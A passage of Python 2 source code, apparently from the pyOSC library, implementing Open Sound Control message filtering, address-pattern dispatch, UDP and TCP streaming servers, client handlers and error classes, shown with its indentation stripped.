'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
